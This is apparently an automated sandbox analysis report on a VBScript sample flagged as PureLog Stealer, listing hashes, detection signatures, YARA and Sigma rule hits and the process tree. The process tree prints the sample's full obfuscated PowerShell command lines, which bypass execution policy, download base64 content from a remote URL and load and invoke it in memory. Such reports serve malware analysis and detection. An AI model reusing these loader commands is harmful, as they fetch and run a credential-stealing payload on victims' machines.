Edit tour
Windows
Analysis Report
kz1fEn2R9Z.vbs
Overview
General Information
Sample name: | kz1fEn2R9Z.vbsrenamed because original name is a hash value |
Original sample name: | 80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03.vbs |
Analysis ID: | 1523834 |
MD5: | 10a145cb87654a33c6c0beda947466b8 |
SHA1: | a504192f1b5ac44e6e49b4bc9ef660220c604469 |
SHA256: | 80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03 |
Tags: | BlindEaglevbsuser-JAMESWT_MHT |
Infos: | |
Detection
PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7548 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\kz1fE n2R9Z.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdnJysnWU Z1cmwgPSAn KydDJysnTk EnKydodHQn KydwcycrJz ovJysnL2lh NjAwMTAwJy snLnVzLicr J2FyY2hpdm UuJysnb3Jn LzI0LycrJ2 l0JysnZW1z LycrJ2RldG EnKydoLW4n KydvJysndG UtJysndi9E ZXRhaE4nKy dvdGVWJysn LicrJ3R4dE NOQScrJztn WUZiYXNlJy snNjRDb250 ZW50ICcrJz 0gKE5lJysn dycrJy1PYm onKydlYycr J3QnKycgU3 lzdCcrJ2Vt Lk4nKydldC crJy5XZWJD bGllbicrJ3 QpJysnLkRv d25sb2FkJy snU3RyaW5n KGdZRicrJ3 VybCknKyc7 ZycrJ1lGYm luYXInKyd5 JysnQ29udG VudCA9ICcr J1tTeXN0ZW 0nKycuQ29u JysndmVydC crJ106OkZy b21CYXNlNj RTJysndCcr J3JpbmcnKy coZ1knKydG YicrJ2FzZS crJzY0Q29u dCcrJ2UnKy duJysndCk7 ZycrJ1lGYS crJ3MnKydz JysnZW1ibC crJ3kgPSBb UmVmbCcrJ2 VjJysndGkn Kydvbi5BJy snc3MnKydl bWJseScrJ1 0nKyc6Oicr J0xvYWQoZ1 lGYmknKydu YXJ5JysnQ2 9uJysndGVu dCcrJyk7Z1 lGdHlwZSA9 IGdZRmEnKy dzc2VtJysn Ymx5LkcnKy dldFR5cGUn KycoQ05BUn VuUEUnKycu SCcrJ29tJy snZUNOJysn QSk7Z1lGJy snbWUnKyd0 aCcrJ29kID 0gZ1lGdCcr J3lwZS5HZX RNZXRob2Qo Q05BVicrJ0 FJQ05BKTtn WUZtZXRob2 QuSW52b2tl KGdZRicrJ2 51bGwsIFtv YmplYycrJ3 RbJysnXV1A KENOQXR4dC 4nKydBWlBQ SEMvNTQnKy czLzg0MS4n KycyMy44Nj EnKycuJysn NDAxLy86cH R0aENOQSAs IENOQWRlc2 F0aXZhZG9D TkEgLCBDTk FkZXNhdGl2 YScrJ2RvQ0 4nKydBICwn KycgQ04nKy dBJysnZGVz YXRpdicrJ2 EnKydkb0NO QSxDJysnTk FSZScrJ2dB c21DTkEnKy csQycrJ05B Q05BJysnKS knKS5yRVBs YUNFKCdDTk EnLFtzdHJJ bmddW0NIYX JdMzkpLnJF UGxhQ0UoJ2 dZRicsJyQn KSB8IC4gKC AkZU5WOkNP bXNwRWNbNC wyNiwyNV0t ak9pTicnKQ ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7608 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7768 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "('g'+ 'YFurl = ' +'C'+'NA'+ 'htt'+'ps' +':/'+'/ia 600100'+'. us.'+'arch ive.'+'org /24/'+'it' +'ems/'+'d eta'+'h-n' +'o'+'te-' +'v/DetahN '+'oteV'+' .'+'txtCNA '+';gYFbas e'+'64Cont ent '+'= ( Ne'+'w'+'- Obj'+'ec'+ 't'+' Syst '+'em.N'+' et'+'.WebC lien'+'t)' +'.Downloa d'+'String (gYF'+'url )'+';g'+'Y Fbinar'+'y '+'Content = '+'[Sys tem'+'.Con '+'vert'+' ]::FromBas e64S'+'t'+ 'ring'+'(g Y'+'Fb'+'a se'+'64Con t'+'e'+'n' +'t);g'+'Y Fa'+'s'+'s '+'embl'+' y = [Refl' +'ec'+'ti' +'on.A'+'s s'+'embly' +']'+'::'+ 'Load(gYFb i'+'nary'+ 'Con'+'ten t'+');gYFt ype = gYFa '+'ssem'+' bly.G'+'et Type'+'(CN ARunPE'+'. H'+'om'+'e CN'+'A);gY F'+'me'+'t h'+'od = g YFt'+'ype. GetMethod( CNAV'+'AIC NA);gYFmet hod.Invoke (gYF'+'nul l, [objec' +'t['+']]@ (CNAtxt.'+ 'AZPPHC/54 '+'3/841.' +'23.861'+ '.'+'401// :ptthCNA , CNAdesati vadoCNA , CNAdesativ a'+'doCN'+ 'A ,'+' CN '+'A'+'des ativ'+'a'+ 'doCNA,C'+ 'NARe'+'gA smCNA'+',C '+'NACNA'+ '))').rEPl aCE('CNA', [strIng][C Har]39).rE PlaCE('gYF ','$') | . ( $eNV:CO mspEc[4,26 ,25]-jOiN' ')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |